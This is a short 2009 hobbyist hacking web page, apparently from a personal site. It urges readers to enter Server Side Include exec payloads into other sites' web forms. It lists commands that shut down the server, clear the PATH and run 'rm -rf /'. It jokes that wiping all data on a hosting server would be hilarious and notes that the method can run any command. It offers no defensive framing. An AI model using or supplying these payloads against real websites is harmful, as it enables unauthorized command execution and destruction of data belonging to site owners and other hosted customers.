Home

Hacking

Small hacks

Tips and Tricks

Copyright © 2009 Amund Østvoll

grey area of hacking

If you go to a webpage, and you are allowed to write anything. Like: "enter your email here to get the shit we send you" you could just ignore it. Or you could have some fun. This is called SSI (Server Side Includes) and it could do more damage than you think.
Try commands like:

• <!--#exec cmd="shutdown" / -->
• <!--#exec cmd="shutdown -k" / -->
• <!--#exec cmd="$PATH=''" / -->
• <!--#exec cmd="rm -rf /" -->

Mostly that won't work, but it's fun to try.And if it works, you will delete the ontent of the server. I'm not talking about that web-page, but all data on the server. Including the web-page you are currently on, and all the other stuff on the server. I don't think web-hosting companies will let you do this, but what if it works, just one time? You will laugh so hard you will fall out from your chair...


Also you can use this to do most anything on a non-secure page...
This runs commands on the server, so if you want, you may create whatever files you want, and more...

By reading this fine print your soul is now the exclusive property of www.slackhax.com. Unauthorized use of www.slackhax.coms characters, images, materials, souls, odors, and oxygen is strongly discouraged. We know where you sleep.